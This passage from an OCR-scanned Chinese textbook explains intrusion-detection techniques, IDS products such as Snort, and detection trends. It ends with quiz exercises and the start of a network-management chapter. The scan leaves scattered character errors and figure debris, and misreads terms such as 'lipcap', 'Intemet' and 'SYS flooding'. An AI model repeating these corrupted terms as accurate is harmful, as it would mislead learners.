径 。 在 该 树 结构 中 可 以 加 入 自 定义 的 协议 节点 ， 在 程序 中 动态 地 维护 和 配置 此 树 的 结构 即 
可 实现 非常 灵活 的 协议 分 析 功 能 。 协 议 分 析 是 第 三 代入 侵 检测 系统 探测 攻击 手法 的 主要 技 
术 ， 它 的 优点 是 解析 命令 字符 串 、 探 测 碎片 攻击 和 协议 确认 、 降 低 误 报 率 、 提 高 检测 性 
能 等 。 


UDP 


[一 SNMP 
ARP 


IPX 
NetBUI 


图 9-14 ”协议 树 示 意图 
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9.6.2 ”常用 的 检测 技术 介绍 


常用 的 检测 技术 有 简单 模式 匹配 、 专 家 系统 、 状 态 转移 分 析 、 统 计 分 析 、 遗 传 算法 、 
人 工 神经 网 络 、 数 据 挖 掘 、 协 议 分 析 和 状态 协议 分 析 等 。 


1. 简单 模式 匹配 


简单 模式 匹配 是 将 收集 到 的 数据 与 入 侵 规则 库 (很 多 入 侵 描 述 匹配 规则 集合 ) 进 行 逐一 
匹配 ， 从 而 发 现 其 中 包含 的 攻击 特征 。 这 个 过 程 可 以 很 简单 ， 如 通过 字符 串 匹 配 来 寻找 一 
个 简单 的 条 目 或 指令 ;也 可 以 很 复杂 ， 如 使 用 数学 模型 来 表示 安全 变化 。 一 般 来 讲 ， 一 个 
入 侵 检测 模式 可 以 用 一 个 过 程 (或 执行 一 条 指令 ) 或 输出 (获取 权限 ) 来 表示 。 其 优点 是 : 原 
理 简单 ， 扩 展 性 好 ， 检 测 效率 高 ， 可 以 实时 监测 ， 系 统 实现 、 配 置 、 维 护 比较 方便 。 缺 点 
是 误 报 率 高 ， 在 编写 复杂 的 入 侵 描述 匹配 规则 时 ， 需 要 的 工作 量 大 ， 不 能 检测 出 未 知 的 入 
侵 行为 。 

2. 专家 系统 


专家 系统 是 最 早 的 误 用 检测 技术 ， 早 期 的 入 侵 检测 系统 多 使 用 这 种 技术 。 首 先 要 把 入 
侵 行为 编码 成 专家 系统 的 规则 ， 使 用 类 似 让 .then 的 规则 格式 输入 已 有 的 知识 (入 侵 检测 
模式 )。If 部 分 为 入 侵 特 征 ，then 部 分 为 系统 防御 措施 ， 当 if 部 分 的 条 件 全 部 满足 时 ， 触 
发 then 部 分 的 防御 措施 ， 然 后 输入 检测 数据 ， 系 统 根据 知识 库 中 的 内 容 对 检测 数据 进行 
评估 ， 判 断 是 否 存 在 入 侵 行 为 。 

专家 系统 的 建立 依赖 于 规则 库 的 完备 性 ， 规 则 库 的 完备 性 又 取决 于 审计 记录 的 完备 性 
与 实时 性 。 建 立 完备 的 规则 库 对 于 大 型 网 络 系统 是 不 可 能 的 ， 而 且 根据 审计 记录 中 的 事件 
提取 状态 行为 与 语言 环境 也 是 比较 困难 的 。 另 外 ， 不 同 的 系统 与 设置 有 不 同 的 规则 ， 这 些 
规则 之 间 无 通用 性 ， 这 就 意味 着 专家 系统 不 能 移植 。 专 家 系统 规则 的 更 新 也 比较 困难 ， 必 
须 由 专业 人 士 进行 规则 的 更 新 。 

专家 系统 的 优点 在 于 把 系统 的 推理 控制 过 程 和 问题 的 最 终 解 答 分 离 ， 用 户 只 需 把 系统 
看 做 一 个 能 自治 的 “黑匣子 ”。 现 在 比较 适用 的 方法 是 把 专家 系统 与 异常 检测 技术 相 结合 
使 用 ， 构 成 一 个 已 知 的 入 侵 检测 规则 为 基础 、 可 扩展 的 动态 入 侵 检测 系统 ， 自 适应 地 进行 
特征 与 异常 检测 。 


3. 状态 转移 分 析 


状态 转移 分 析 是 使 用 高 层 状态 转移 图 来 表示 和 检测 已 知 入 侵 的 误 用 检测 技术 。 所 有 入 
侵 者 的 入 侵 过 程 都 可 以 看 做 是 从 有 限 的 特权 开始 ， 利 用 系统 的 弱点 ， 逐 步 提升 自身 的 权 
限 。 系 统 状态 迁移 正 是 利用 这 一 共性 来 表示 入 侵 特征 的 状态 ， 并 具有 迁移 到 其 他 状态 的 触 
发 条 件 ， 通 过 弧 将 连续 的 状态 连接 起 来 表示 状态 改变 所 需要 的 条 件 。 在 该 方法 中 ， 入 侵 以 
入 侵 者 执行 的 活动 序列 来 描述 ， 该 序列 是 从 系统 的 初始 状态 到 最 终 的 危害 状态 。 初 始 状 态 
对 应 用 于 入 侵 开始 时 的 系统 状态 ， 危 害 状态 对 应 用 于 入 侵 完成 时 的 系统 状态 。 

状态 转移 分 析 方 法 的 缺点 是 : 不 能 检测 那些 不 能 表示 成 状态 迁移 图 的 入 侵 行为 ， 也 不 
能 描述 比较 复杂 的 事件 ， 需 要 结合 其 他 检测 方法 使 用 。 其 优点 是 : 提供 了 一 个 直观 的 、 与 
审计 记录 无 关 的 入 侵 场景 描述 ， 能 检测 出 分 布 在 多 个 会 话 中 的 单一 攻击 和 协同 攻击 。 
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4. 统计 分 析 


统计 分 析 是 出 现 最 早 、 使 用 最 广泛 的 异常 检测 技术 。 首 先 ， 统 计 分 析 技 术 对 每 一 个 系 
统 用 户 和 系统 主体 用 某 种 统计 模型 建立 历史 统计 模式 ， 并 定期 更 新 以 便 及 时 地 反映 出 用 户 
行为 随时 间 推 移 而 产生 的 变化 。 监 测 系统 维护 一 个 由 行为 模式 组 成 的 统计 知识 库 ， 每 个 模 
式 采 用 一 系列 统计 参数 来 表示 特定 用 户 正常 行为 。 然 后 依据 统计 知识 库 检 测 用 户 对 系统 使 
用 的 情况 ， 看 是 否 有 异常 的 用 户 行为 来 判断 系统 是 否 受到 入 侵 ; 也 就 是 说 ， 系 统 根据 用 户 
以 前 的 历史 行为 记录 来 决定 用 户 当前 的 行为 是 否 合法 。 

统计 分 析 方法 有 两 大 关键 技术 : 一 个 是 建立 科学 、 客 观 的 统计 模型 ， 另 一 个 是 选择 合 
适 的 统计 参数 。 有 5 种 统计 模型 用 于 入 侵 检测 : 操作 模型 、 方 差 、 多 元 模型 、 马 尔 可 夫 过 
程 模型 和 时 间 序列 分 析 。 统 计 模 型 常用 的 统计 参数 包括 数据 流量 包 、 事 件数 量 、 时 间 参 
数 、 资 源 占用 等 。 

统计 分 析 方法 的 缺点 是 : 统计 分 析 检 测 过 程 总 是 滞后 于 审计 记录 的 产生 ， 不 能 提供 对 
入 侵 的 实时 检测 和 自 响 应 功能 ， 能 表达 的 时 间 范 围 有 限 (不 能 反映 事件 在 时 间 顺 序 上 的 前 
后 相关 性 ) ; 确定 合适 的 阔 值 比较 困难 。 优 点 是 : 维护 方便 ， 规 则 库 不 需要 即时 更 新 ， 可 
以 “学 习 ” 用 户 的 使 用 习惯 ， 从 而 具有 较 高 的 检 出 率 与 可 用 性 。 

5. 遗传 算法 

遗传 算法 是 一 种 优化 技术 ， 通 过 遗传 算法 可 以 进行 特征 或 规则 的 提取 和 优化 。 它 利用 
生物 进化 的 概念 进行 问题 的 搜索 ， 最 终 达 到 优化 的 目的 。 该 算法 在 实施 中 ， 先 对 求解 问题 
进行 编码 ， 产 生 初 始 群 体 ， 接 着 计算 个 体 的 适应 速度 ， 再 进行 染色 体 复制 、 交 换 、 突 变 等 
操作 ， 便 产生 了 新 的 个 体 。 重 复 以 上 操作 ， 直 到 求 得 最 佳 或 较 佳 的 个 体 。 遗 传 算法 在 对 异 
常 检测 的 准确 率 和 速度 上 有 较 大 的 优势 ， 但 主要 的 不 足 是 不 能 在 审计 跟踪 中 精确 定位 攻 
击 ， 这 一 点 和 人 工 神经 网 络 面临 的 问题 相似 。 


6. 人 工 神经 网 络 


人 工 神经 网 络 具 有 自学 习 、 自 适应 的 能 力 ， 只 要 提供 系统 的 审计 数据 ， 人 工 神经 网 络 
就 会 通过 自学 习 从 中 提取 正常 用 户 或 系统 活动 的 特征 模式 ， 避 开 选 择 统计 特征 的 困难 问 
题 。 它 提出 了 对 于 基于 统计 方法 的 入 侵 检测 技术 的 改进 方向 ， 目 前 还 没有 成 熟 的 产品 ， 但 
该 方法 大 有 前 途 ， 值 得 研究 。 其 主要 不 足 是 不 能 为 其 检测 提供 任何 令 人 信服 的 解释 。 


7. 数据 挖掘 


数据 挖掘 采用 的 是 以 数据 为 中 心 的 观点 ， 它 把 入 侵 检测 问题 看 作 一 个 数据 分 析 过 程 ， 
从 审计 数据 流 或 网 络 数据 流 中 提取 感 兴趣 的 知识 表示 为 概念 、 规 则 、 规 律 、 模 式 等 形式 ， 
用 这 些 知识 去 检测 异常 入 侵 和 已 知 的 入 侵 。 具 体 的 工作 包括 利用 数据 挖掘 中 的 关联 算法 和 
序列 挖掘 算法 提取 用 户 的 行为 模式 ， 利 用 分 类 算法 对 用 户 行为 和 特权 程序 的 系统 调用 进行 
分 类 预测 。 

数据 挖掘 方法 的 优点 有 : 能 够 主动 分 析 收 集 到 的 网 络 和 主机 的 数据 ， 并 从 中 归纳 出 相 
应 的 模型 ， 以 便 用 于 检测 分 析 同 类 型 的 入 侵 ; 可 进行 主机 学 习 和 模式 扩充 ， 使 得 手工 和 经 
验 成 分 减少 ， 从 而 减 小 系统 的 误 报 率 和 漏 报 率 。 该 方法 的 缺点 是 : 挖掘 不 同类 型 的 知识 时 
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不 够 灵活 ; 在 处 理 噪声 和 不 完全 数据 时 可 能 搞 乱 分 析 过 程 ， 从 而 造成 精确 度 的 降低 ， 其 有 
效 性 和 可 伸缩 性 的 问题 需要 进一步 的 处 理 。 


8. 协议 分 析 和 状态 协议 分 析 


协议 分 析 是 在 传统 模式 匹配 技术 基础 之 上 发 展 起 来 的 一 种 新 的 入 侵 检 测 技术 。 它 充分 
利用 网 络 协议 的 高 度 有 序 性 ， 并 结合 高 速 数 据 包 捕捉 、 协 议 分 析 和 命令 解析 ， 来 快速 检测 
某 个 攻击 特征 是 否 存 在 ， 这 种 技术 正 逐 渐进 入 成 熟 应 用 阶段 。 

状态 协议 分 析 就 是 在 常规 协议 分 析 技 术 的 基础 之 上 ， 加 入 状态 特性 分 析 ， 即 不 是 检测 
单一 的 连接 请 求 或 响应 ， 而 是 将 一 个 会 话 的 所 有 流量 作为 一 个 整体 来 考虑 。 有 些 网 络 攻击 
行为 仅 靠 检测 单一 的 连接 请 求 或 响应 是 检测 不 到 的 ， 因 为 其 攻击 行为 包含 在 多 个 请 求 中 。 
此 时 ， 状 态 协议 分 析 就 显得 十 分 必要 。 

协议 分 析 和 状态 协议 分 析 与 模式 匹配 相 比 ， 其 优点 有 : 协议 分 析 利 用 已 知 结构 的 通信 
协议 ， 与 模式 匹配 系统 中 传统 的 穷 举 方法 相 比 ， 在 处 理 数 据 帧 和 链接 时 更 迅速 、 更 有 效 ; 
与 非 智能 化 的 模式 匹配 相 比 ， 协 议 分 析 减 少 了 误 报 和 漏 报 ; 当 协 议 分 析 入 侵 检测 系统 引擎 
评估 某 个 数据 包 时 ， 需 要 考虑 在 这 之 前 相关 的 数据 包 内 容 以 及 接 下 来 可 能 出 现 的 数据 包 ， 
与 此 相反 ， 模 式 匹 配 入 侵 检测 系统 孤立 的 考察 每 个 数据 包 ; 协议 分 析 具 有 判别 通信 行为 真 
实意 图 的 能 力 ， 能 够 有 效 抵御 利用 路 径 模糊 、 十 六 进 制 编码 和 Unicode 编码 等 隐藏 的 攻击 
行为 ， 协 议 分 析 的 高 效 性 降低 了 资源 在 网 络 和 主机 探测 中 的 资源 消耗 ， 而 模式 匹配 技术 却 
会 大 量 的 消耗 系统 资源 。 


9.6.3 ”入 侵 检 测 系统 主流 产品 


近年 来 ， 国 内 外 不 少 厂 家 生产 了 自己 的 入 侵 检 测 产 品 。 这 些 产 品 已 经 得 到 了 广泛 的 应 
用 ， 下 面 简要 介绍 一 下 国内 外 的 一 些 产 品 。 


1. Cisco 公司 的 Cisco Secure IDS 


Cisco Secure IDS 以 前 被 称 为 NetRanger， 该 产品 由 控制 器 (Director)、 感 应 器 (Sensor) 
和 入 侵 检测 模块 IDSM(Intrusion Detection System Module) 三 大 部 分 组 成 。 感 应 器 分 为 网 络 
感应 器 (NIDS) 和 主机 感应 器 (HIDS) 两 部 分 ， 分 别 负责 对 网 络 信息 和 主机 信息 的 收集 和 分 析 
处 理 。 控 制 器 用 于 对 系统 进行 控制 和 管理 。 

Cisco Secure IDS 的 另 一 个 强项 是 其 在 检测 时 不 仅 观 察 单个 包 的 内 容 ， 而 且 还 要 看 上 
下 文 ， 即 从 多 个 包 中 得 到 线索 。Cisco Secure IDS 是 目前 市 场 上 基于 网 络 的 入 侵 检 测 系 统 
中 经 受 实践 考验 最 多 的 产品 之 一 。 


2. ISS RealSecure 


ISS 是 最 早 将 基于 主机 和 基于 网 络 的 入 侵 检测 系统 完全 集成 到 一 个 统一 的 管理 框架 中 
的 供应 商 之 一 。 ISS RealSecure 具有 方便 的 管理 控制 台 ， 其 服务 器 和 网 络 感应 器 近 几 年 也 
得 到 了 很 快 的 发 展 。 

RealSecure 采用 分 布 式 的 体系 结构 、 系 统 分 为 两 层 ， 感应 器 和 管理 器 。 感 应 器 包括 网 
络 感应 器 、 服 务 感 应 器 和 系统 感应 器 三 类 。 网 络 感应 器 主要 是 对 网 络 数据 的 分 析 检 测 ， 服 
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务 感应 器 主要 是 负责 对 系统 日 志和 系统 文件 信息 的 检测 。 管 理 器 包括 控制 台 、 事 件 收集 
器 、 事 件数 据 库 和 报警 数据 库 4 个 部 分 。 


3.“ 冰 之 眼 ” 网 络 入 侵 检测 系统 


“ 冰 之 眼 ” 网 络 入 侵 检测 系统 是 绿 盟 科技 开发 的 网 络 入 侵 检测 产品 。 具 有 卫 碎片 重 
组 能 力 ， 同 时 具有 基于 特征 和 异常 两 种 检测 模式 ， 能 够 提供 多 种 入 侵 保护 方式 ， 并 能 与 多 
种 防火 墙 进行 联动 。 全 自动 在 线 升级 系统 使 其 能 够 和 绿 盟主 站 点 保持 规则 库 的 同步 更 新 。 


4. 开源 入 侵 检 测 系统 Snort 


Snort 是 以 开放 源 代码 (Open Source) 形 式 发 行 的 一 个 高 性 能 、 跨 平台 的 轻 量 级 网 络 入 
侵 检测 系统 ， 在 网 络 安全 方面 有 着 极 高 的 地 位 ， 并 且 应 用 十 分 广泛 。 在 世界 著名 的 专业 安 
全 网 站 insecure.org 进行 的 2006 年 网 络 安全 工具 Top100 评选 中 ，Snort 名 列 三 甲 ， 而 在 入 
侵 检测 一 类 中 ， 更 是 头 名 状元 。 

Snort 是 一 个 用 C 语言 编写 的 开放 源 代码 软件 ， 符 合 公共 通用 许可 证 (GPL) 的 要 求 ， 其 
作者 是 Martin Roesch。Snort 是 免费 的 、 跨 平台 的 网 络 入 侵 检 测 软 件 ， 具 有 很 好 的 扩展 
性 。Snort 采用 基于 规则 的 网 络 信息 搜索 机 制 ， 对 数据 包 进 行内 容 匹配 ， 从 中 发 现 入 侵 和 
探测 行为 。 

Snort 由 3 个 子 系统 组 成 : 数据 包 解码 器 、 检 测 引擎 和 日 志 /报警 子 系统 。 

1) ”数据 包 解码 器 

该 子 系统 的 功能 是 捕获 网 络 上 的 传输 数据 并 按照 TCP/IP 的 不 同 层次 将 数据 包 进 行 解 
析 。Snort 利用 lipcap 库 函 数 进行 数据 采集 ， 该 库 函 数 可 以 为 应 用 程序 提供 直接 从 数据 链 
路 层 捕获 数据 包 的 接口 函数 ， 并 可 以 设置 数据 包 的 过 滤器 来 捕获 指定 的 数据 。 网 络 数据 采 
集 和 解析 机 制 是 整个 Snort 实现 的 基础 ， 其 中 关键 的 是 要 保证 高 速率 和 低 丢 包 率 ， 这 不 仅 
取决 于 软件 的 效率 ， 还 同 硬件 的 处 理 能 力 有 关 。 对 于 解析 机 制 来 说 ， 能 够 处 理 数 据 包 类 型 
的 多 样 性 也 非常 重要 。 目 前 ，Snort 可 以 处 理 以 太 网 、 令 牌 环 网 以 及 SLIP 等 多 种 数 
据 包 。 

2) ”检测 引擎 

检测 引擎 是 Snort 的 核心 ， 准 确 性 和 快速 性 是 衡量 其 性 能 的 重要 标志 。 准 确 性 主要 取 
决 于 对 入 侵 行为 特征 码 提取 的 精确 性 和 规则 撰写 的 简洁 实用 性 。 由 于 网 络 入 侵 检测 系统 是 
被 动 地 检测 流 经 本 网 络 的 数据 ， 而 不 是 主动 发 送 数据 包 去 探测 ， 所 以 只 有 将 入 侵 行为 的 特 
征 码 归结 为 协议 的 不 同 字段 的 特征 值 才 能 判断 入 侵 行为 是 否 发 生 。 快 速 性 主要 取决 于 引擎 
的 组 织 结构 是 否 能 够 快速 地 进行 规则 匹配 。 

为 了 能 够 快速 准确 地 进行 检测 ，Snort 将 检测 规则 利用 链表 的 形式 进行 组 织 ， 链 表 分 
为 规则 头 和 规则 选项 两 部 分 。 规 则 头 是 所 有 规则 共有 的 ， 包 括 人 P 地 址 、 端 口号 等 ， 规 则 
选项 根据 不 同 规则 ， 包 括 相应 字段 的 关键 字 。 

当 进 行规 则 匹配 时 ， 在 链表 的 两 个 方向 同时 进行 ， 检 测 引 擎 只 检测 那些 一 开始 在 规则 
解析 器 中 设置 好 的 规则 选项 。 当 检测 引擎 到 第 一 个 与 被 解码 的 数据 包 相 匹配 的 规则 时 ， 触 
发 相应 的 动作 并 返回 。 
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3) ”日志 /报警 子 系统 

Snort 对 每 个 被 检测 的 数据 包 都 定义 了 3 种 处 理 方式 :alert( 发 送 报警 信息 )、log( 记 录 
该 数据 包 ) 和 pass( 忽 略 该 数据 包 )。 具 体 是 在 检测 规则 中 定义 、 在 日 志 /报警 系统 中 完成 
的 , 日 志 电 子 系统 允许 将 包 解 码 收集 到 的 信息 以 可 读 的 格式 或 以 tcpdump 格式 记录 下 
来 。 报 警 子 系统 是 将 报警 信息 发 送 到 syslog、 用 户 指 定 的 文件 、Unix 套 接 字 或 数据 库 中 。 

Snort 的 系统 结构 如 图 9-15 所 示 ， 由 7 个 模块 组 成 : 主 控 模块 、 解 码 模块 、 规 则 处 理 
模块 、 预 处 理 插件 、 处 理 插件 、 输 出 插件 和 日 志 模块 。 


| 预 处 理 插件 处 理 插件 输出 插件 


人 


规则 处 理 模 块 


图 9-15 Snort 系统 结构 


1) “ 主 控 模 块 

主 控 模 块 的 功能 包括 所 有 模块 的 初始 化 、 命 令 行 解释 、 配 置 文件 解释 、libpcap 初始 
化 ， 然 后 调用 libpcap 开始 捕获 数据 包 ， 并 进行 解码 检测 入 侵 、 管 理 所 有 插件 。 

2) ”解码 模块 

解码 模块 把 网 络 上 抓 取 的 原始 数据 包 ， 从 下 向 上 沿 各 个 协议 栈 进行 解码 并 填写 相应 的 
数据 结构 ， 以 便 规则 处 理 模块 处 理 。 

3) ”规则 处 理 模 块 

规则 处 理 模块 对 这 些 报 文 进行 基于 规则 的 模式 匹配 ， 检 测 入 侵 行为 ， 初 始 化 阶段 负责 
规则 文件 解释 和 规则 语法 树 的 构建 。 

规则 处 理 模 块 在 执行 检测 工作 时 使 用 了 3 种 形式 的 插件 ， 分 别 为 预 处 理 插件 、 处 理 插 
件 和 输出 插件 。 

(1) 预 处 理 插 件 

预 处 理 插 件 在 模式 匹配 之 前 执行 ， 对 报 文 进行 分 片 重组 、 流 重组 和 异常 检查 。 

(2) 处 理 插件 

处 理 插件 主要 检查 数据 包 的 各 个 方面 ， 如 数据 包 大 小 、 协 议 类 型 、IP/ICMP/TCP 选项 
等 ， 辅 助 规则 匹配 完成 检测 功能 。 
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(3) 输出 插件 

输出 插件 用 于 在 检测 到 攻击 后 执行 各 种 输出 和 反应 。 

4) 日 志 模 块 

日 志 模 块 用 于 实现 各 种 报 文 日 志 功 能 。 

Snort 的 入 侵 检测 过 程 分 为 两 步 : 规则 分 析 和 规则 匹配 。 

1) ”规则 分 析 

Snort 首先 读 取 规则 文件 ， 紧 接着 依次 读 取 每 一 条 规则 ， 然 后 对 其 进行 解释 分 析 ， 并 
用 相应 的 规则 语法 表示 ; 在 内 存 中 进行 组 织 ， 建 立 语法 树 。 

2) ”规则 匹配 

规则 匹配 的 过 程 就 是 对 从 网 络 上 捕获 的 每 一 条 数据 报 文 和 上 面 的 规则 树 进行 匹配 的 过 
程 。 如 果 发 现存 在 一 条 规则 匹配 该 报 文 ， 就 表示 检测 到 一 个 攻击 ， 然 后 根据 规则 指定 的 行 
为 进行 处 理 ， 如 果 搜 索 完 所 有 的 规则 都 没有 找到 匹配 的 规则 ， 就 表示 报 文 是 正常 的 。 


9.6.4 ”入 侵 检 测 技 术 发 展 趋势 


入 侵 检测 技术 在 不 断 地 发 展 更 新 ， 近 年 来 入 侵 检测 技术 沿 着 以 下 几 个 方向 发 展 。 

(1) 分 布 式 入 侵 检测 。 为 了 躲避 检测 ， 越 来 越 多 的 攻击 者 采用 分 布 式 协同 的 方式 发 起 
攻击 ， 传 统 的 IDS 局 限于 单一 的 主机 或 网 络 架构 ， 对 异 构 系统 及 大 规模 的 网 络 检测 明显 不 
足 ， 不 同 的 系统 之 间 不 能 协同 工作 。 为 解决 这 一 问题 ， 需 要 发 展 分 布 式 入 侵 检测 技术 与 通 
用 入 侵 检测 架构 。 

(2) 智能 化 入 侵 检测 。 入 侵 方 法 越 来 越 多 样 化 与 综合 化 ， 尽 管 已 经 有 智能 代理 、 神 经 
网 络 与 遗传 算法 在 入 侵 检测 领域 应 用 研究 ， 但 这 只 是 一 些 尝试 性 的 研究 工作 ， 需 要 对 智能 
化 的 IDS 加 以 进一步 的 研究 以 解决 其 自学 习 与 自 适应 能 力 。 

(3) 应 用 层 入 侵 检 测 。 许 多 入 侵 活 动 的 含义 只 有 在 应 用 层 才能 理解 。 但 传统 方法 很 少 
涉及 应 用 层 ， 使 得 一 些 应 用 系统 内 的 入 侵 活 动 难以 检测 ， 所 以 需要 开发 应 用 层 的 入 侵 检测 
技术 。 

(4) 全 面 的 安全 防御 方案 。 即 使 用 安全 工程 风险 管理 的 思想 与 方法 来 处 理 网 络 安全 问 
题 ， 将 网 络 安全 作为 一 个 整体 工程 来 处 理 。 从 管理 、 网 络 结构 、 加 密 通道 、 防 火 墙 、 病 毒 
防护 、 入 侵 检 测 多 方位 全 面 对 所 关注 的 网 络 作 全 面 的 评估 ， 然 后 提出 可 行 的 全 面 解决 
方案 。 


9.7 本 章 小 结 


随 着 Intemet 的 迅速 发 展 ， 网 络 与 信息 安全 问题 日 益 突出 。 网 络 犯罪 、 黑 客 攻击 等 现 
象 时 有 发 生 ， 严 重 危 及 人 们 的 正常 工作 。 全 球 因 网 络 安全 问题 带 来 的 损失 已 高 达 数 百 亿 
美元 。 

本 章 主要 介绍 了 常见 的 黑客 攻击 的 方法 和 手段 ， 并 给 出 了 相应 的 攻击 防范 措施 ， 还 介 
绍 了 入 侵 检测 相关 技术 及 其 主流 产品 ， 主 要 是 为 了 方便 用 户 了 解 黑客 攻击 的 流程 及 如 何 防 
范 攻击 ， 采 取 有 效 的 防御 措施 。 


330 


9.8 课 后 习题 


1. 填空 题 


(1) Snort 系统 由 3 个 子 系统 组 成 : 
(2) 网 络 攻击 是 指 
(3) 典型 的 ARP 欺骗 分 为 两 种 :一 种 是 ; 另 一 种 是 对 内 网 PC 的 网 关 欺 骗 。 


和 


(4) 在 入 侵 检测 分 析 模型 中 ， 状 态 转换 方法 属于 检测 。 
2. 选择 题 
(1) 拒绝 服务 攻击 是 对 计算 机 网 络 的 (  ) 安 全 属性 的 破坏 。 
A. 保密 性 B. 完整 性 
C. 可 用 性 D. 不 可 否认 性 


(2) 下 面 关于 防火 墙 的 说 法 中 ， 正 确 的 是 (  )。 
A. 防火 墙 不 会 降低 计算 机 网 络 系统 的 性 能 
B. 防火 墙 可 以 解决 来 自 内 部 网 络 的 攻击 
C. 防火 墙 可 以 阻止 感染 病毒 文件 的 传送 
D. 防火 墙 对 绕 过 防火 墙 的 访问 和 攻击 无 能 为 力 
(3) 端口 扫描 技术 (  )。 


A. 只 能 作为 攻击 工具 
B. 只 能 作为 防御 工具 
C. 只 能 作为 检查 系统 漏洞 的 工具 
D. 既 可 以 作为 攻击 工具 ， 也 可 以 作为 防御 工具 
(4) 恶意 代码 的 特征 不 体现 (  )。 
A. 恶意 的 目的 B. 本 身 是 程序 
C. 通过 执行 发 生 作用 D. 不 通过 执行 也 能 发 生 作用 
(5) 下 列 对 计算 机 网 络 的 攻击 方式 中 ， 属 于 被 动 攻击 的 是 (  )。 
A. 口令 噢 探 B. 重 放 
C. 拒绝 服务 D. 物理 破坏 
(6) 入 侵 检测 的 分 析 处 理 过 程 不 包括 (  )。 
A. 构建 分 析 器 阶段 B. 对 现场 数据 进行 分 析 阶段 
C. 反馈 和 提炼 阶段 D. 响应 处 理 阶 段 
3. 判断 题 


(1) 入侵 检测 的 目的 是 提供 实时 的 检测 及 采取 相应 的 防护 手段 ， 阻 止 黑客 的 入 侵 。 

( 
(2) 恶意 代码 (或 称 恶意 程序 ) 属 于 一 种 很 特殊 的 主动 攻击 方式 。 ( 
(3) 格式 化 字符 串 攻 击 也 是 缓冲 区 溢出 攻击 的 一 种 。 ( 
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4. 简单 题 

(1) 简 述 常见 的 网 络 攻击 方法 和 手段 ， 以 及 主要 的 防御 措施 。 
(2) 入 侵 检测 系统 弥补 了 防火 墙 的 哪些 不 足 ? 

(3) 试 论 述 SYS flooding 攻击 的 过 程 。 

(4) 试 论述 Snort 的 入 侵 检测 过 程 。 

(5) 简 述 入 侵 检测 的 发 展 趋势 。 


第 10 章 


随 着 因特网 与 互联 网 经 济 的 迅猛 发 展 ， 网 络 的 经 济 效益 越 来 越 
依赖 于 对 网 络 的 有 效 管理 ， 同 时 现代 网 络 的 庞大 结构 使 得 运营 、 设 
备 和 业务 越 来 越 复杂 。 一 方面 互联 网 所 提供 的 功能 性 业务 迅猛 增 
长 ， 多 业务 融合 的 大 型 综合 业务 已 成 为 互联 网 服务 的 趋势 ; 另 一 方 
面 设备 与 服务 的 厂商 越 来 越 多 ， 产 品 规格 花样 繁多 ， 这 种 复杂 性 使 
得 网 络 管理 无 法 再 用 传统 的 手工 方式 来 完成 ， 必 须 采 用 先进 有 效 的 


手段 ， 同 时 针对 现代 网 络 的 运营 、 组 织 和 维护 等 已 
学 问 。 本 章 我 们 将 主要 学 习 有 关 网 络 管理 的 一 些 
原理 。 
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10.1 网 络 管理 概述 


从 网 络 控制 和 网 络 支撑 角度 看 ， 目 前 通信 网 可 划分 为 专业 网 (承载 网 及 业务 网 ] 和 支撑 
网 ， 其 中 专业 网 又 可 以 分 为 有 线 电视 网 、 数 据 网 、 移 动 网 等 ， 支 撑 网 可 以 包括 同步 网 、 信 
令 网 、 网 络 管理 系统 等 。 由 于 目前 网 络 的 复杂 性 和 规模 性 ， 如 果 没 有 有 力 的 网 络 管理 作为 
支撑 ， 任 何 网 络 都 难以 在 运营 过 程 中 有 效 地 朴 通 业务 量 及 提高 网 络 资源 的 利用 率 ， 也 难以 
避免 业务 拥塞 和 通信 故障 等 问题 。 因 此 ， 网 络 管理 的 定义 在 一 定 程度 上 可 以 概括 为 是 对 网 
络 的 性 能 、 品 质 和 安全 性 进行 监测 和 控制 的 过 程 ， 提 供 运营 、 组 织 、 维 护 和 开通 等 功能 ， 
以 保证 通信 网 高 效 、 安 全 、 可 靠 和 经 济 的 运行 ， 同 时 现代 网 络 很 多 在 业务 和 资源 方面 的 巨 
大 潜力 也 需要 依靠 有 效 的 网 络 管理 来 挖掘 。 


10.1.1 网 络 管理 的 目标 和 任务 


国际 标准 化 组 织 对 网 络 管理 定义 了 五 大 通用 功能 : 故障 管理 、 性 能 管理 、 配 置 管理 、 
安全 管理 和 计 费 管理 ; 在 实际 环境 中 ， 网 络 管理 要 达到 的 目标 应 满足 网 络 的 运营 者 及 其 用 
户 对 网 络 的 基本 要 求 。 


1. 网 络 管理 的 基本 目标 


1) 网络 的 有 效 性 

网 络 应 具有 准确 及 时 传递 信息 的 有 效 性 ， 可 以 保证 通信 业务 的 传输 质量 满足 网 络 运营 
者 和 用 户 的 需求 。 

2) ”网络 的 可 靠 性 

网 络 应 具有 可 靠 性 ， 应 能 保证 网 络 持续 稳定 的 运行 ， 要 对 各 种 故障 、 干 扰 甚 至 自然 灾 
害 、 军 事 打击 等 具有 一 定 较 强 的 抵御 能 力 和 一 定 的 自 愈 能 力 。 网 络 的 类 型 、 作 用 及 其 影响 
力 等 因素 是 决定 网 络 对 可 靠 性 要 求 高 低 的 决定 性 因素 ， 也 就 是 说 不 同 网 络 对 可 靠 性 的 描述 
和 要 求 是 不 同 的。 另外 ， 我 们 也 应 该 认识 到 绝对 可 靠 的 网 络 是 不 存在 的 ， 为 了 获得 高 度 可 
靠 的 网 络 ， 必 须 增加 大 量 的 投资 和 维护 力量 ， 这 就 要 在 芥 利 标 准 、 可 靠 性 和 成 本 之 间 进 行 
有 效 的 权衡 。 

3) ”网 络 的 开放 性 

网 络 要 尽 可 能 地 兼容 各 种 类 型 的 协议 、 标 准 、 业 务 和 设备 ， 这 是 现代 网 络 高 速 发 展 和 
技术 革新 的 前 提 条 件 。 

4) ”网 络 的 综合 性 

现代 网 络 趋向 于 多 业务 融合 ， 已 不 再 是 过 去 单一 化 的 业务 模式 ， 网 络 已 经 向 包括 数 
据 、 语 音 、 视 频 、 图 像 等 多 业务 融合 的 宽带 综合 业务 网 方向 过 渡 。 网 络 的 综合 性 和 多 业务 
的 融合 ， 在 给 网 络 经 营 者 带 来 高 利润 的 同时 ， 也 给 互联 网 用 户 带 来 了 更 大 的 方便 和 新 的 体 
验 ， 人 们 的 通信 方式 和 生活 方式 越 来 越 多 样 化 。 

5) ”网 络 的 安全 性 

当前 网 络 安全 形势 日 益 严峻 ， 人 们 对 网 络 的 依赖 性 越 强 ， 安 全 性 问题 就 越 突 出 ， 因 此 
对 网 络 的 通信 保密 性 、 数 据 的 安全 性 和 一 致 性 、 防 止 非法 访问 和 越权 访问 ， 以 及 防止 反 
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动 、 淫 秽 等 有 害 信 息 的 传播 等 安全 性 问题 要 求 越 来 越 高 。 

6) 网络 的 经 济 性 

